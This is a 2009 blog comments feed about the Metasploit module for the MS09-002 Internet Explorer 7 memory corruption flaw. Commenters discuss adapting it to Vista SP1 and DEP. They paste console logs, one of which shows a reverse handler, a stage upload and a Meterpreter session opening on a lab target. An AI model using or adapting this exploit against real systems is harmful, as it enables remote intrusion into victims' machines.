tag:blogger.com,1999:blog-8539880144347728238.post1033378904926126388..comments2024-01-24T04:15:08.086-05:00Comments on Carnal0wnage Blog: MS09_002 Memory Corruption UpdateUnknownnoreply@blogger.comBlogger9125tag:blogger.com,1999:blog-8539880144347728238.post-81105503241605261542009-02-26T11:38:00.000-05:002009-02-26T11:38:00.000-05:00solved my own prob, thanks!solved my own prob, thanks!Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8539880144347728238.post-79343722113571110412009-02-26T11:21:00.000-05:002009-02-26T11:21:00.000-05:00msf exploit(ms09_002_memory_corruption) > explo...msf exploit(ms09_002_memory_corruption) > exploit<BR/>[*] Exploit running as background job.<BR/>msf exploit(ms09_002_memory_corruption) > <BR/>[*] Handler binding to LHOST 0.0.0.0<BR/>[*] Started reverse handler<BR/>[-] Exploit failed: Permission denied - bind(2)<BR/><BR/> where's the prob? help!Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8539880144347728238.post-7683324950195886242009-02-23T14:32:00.000-05:002009-02-23T14:32:00.000-05:00Oh yeah, that would be nice, being able to play wi...Oh yeah, that would be nice, being able to play with sp1 too ! Please update the exploit to support SP1 !Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8539880144347728238.post-79475633367921415172009-02-21T12:58:00.000-05:002009-02-21T12:58:00.000-05:00well overwrite that shizzle with the SP1 version, ...well overwrite that shizzle with the SP1 version, i'm sure everyone wont mind :-)CGhttps://www.blogger.com/profile/11061967917509053185noreply@blogger.comtag:blogger.com,1999:blog-8539880144347728238.post-13441571843986226542009-02-21T12:23:00.000-05:002009-02-21T12:23:00.000-05:00oddly, mine and the commited module look the same?...oddly, mine and the commited module look the same? <BR/><BR/>With some slight modifications to the heap code, exploitation on IE7/Vista SP1<BR/>is possible.<BR/><BR/>msf exploit(ms09_002_deleteobject) > rexploit<BR/>[*] Exploit running as background job.<BR/>msf exploit(ms09_002_deleteobject) ><BR/>[*] Handler binding to LHOST 172.10.1.103<BR/>[*] Started reverse handler<BR/>[*] Using URL: http://0.0.0.0:8080/vistasp1<BR/>[*] Local IP: http://172.10.1.103:8080/vistasp1<BR/>[*] Server started.<BR/>[*] Target is Windows Vista<BR/>[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Overflow to 172.10.1.105:49277...<BR/>[*] Transmitting intermediate stager for over-sized stage...(191 bytes)<BR/>[*] Sending stage (2650 bytes)<BR/>[*] Sleeping before handling stage...<BR/>[*] Uploading DLL (75787 bytes)...<BR/>[*] Upload completed.<BR/>[*] Meterpreter session 1 opened (172.10.1.103:65535 -> 172.10.1.105:49278)<BR/><BR/>msf exploit(ms09_002_deleteobject) > sessions -i 1<BR/>[*] Starting interaction with 1...<BR/><BR/>meterpreter > sysinfo<BR/>Computer: DA-RIZZLE<BR/>OS : Windows 2000 (Build 6001, Service Pack 1).<BR/>meterpreter >Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8539880144347728238.post-9173687470710595902009-02-20T14:44:00.000-05:002009-02-20T14:44:00.000-05:00Building up the Vista sp1 image as we speak. I'll...Building up the Vista sp1 image as we speak. I'll get back to you asap.<BR/><BR/>Hmmm... just tried it, does not seem to work on a test computer running SP1... doing further testing as I don't know if it has the ie7 fix installed.Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8539880144347728238.post-90503838969106913602009-02-20T14:38:00.000-05:002009-02-20T14:38:00.000-05:00Building up the Vista sp1 image as we speak. I'll...Building up the Vista sp1 image as we speak. I'll get back to you asap.Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8539880144347728238.post-9530635414752679832009-02-20T14:25:00.000-05:002009-02-20T14:25:00.000-05:00I did not have a Vista SP1 image to test it on but...I did not have a Vista SP1 image to test it on but try it. The ret used (0x0C..) should be the same. Does sp1 enable opt-out mode for DEP by default? That would include IE7 then I think and that will break the sploit. <BR/><BR/>Let me know how it goes.dean de beerhttps://www.blogger.com/profile/13744345182407258839noreply@blogger.comtag:blogger.com,1999:blog-8539880144347728238.post-85687142126544353112009-02-20T14:14:00.000-05:002009-02-20T14:14:00.000-05:00Thanks for the heads up !Wondering, is this exploi...Thanks for the heads up !<BR/><BR/>Wondering, is this exploit only possible on a SP0 version of Vista, or it could work on a SP1 too ? (Considering the ie7 fix hasn't been applied yet...)Anonymousnoreply@blogger.com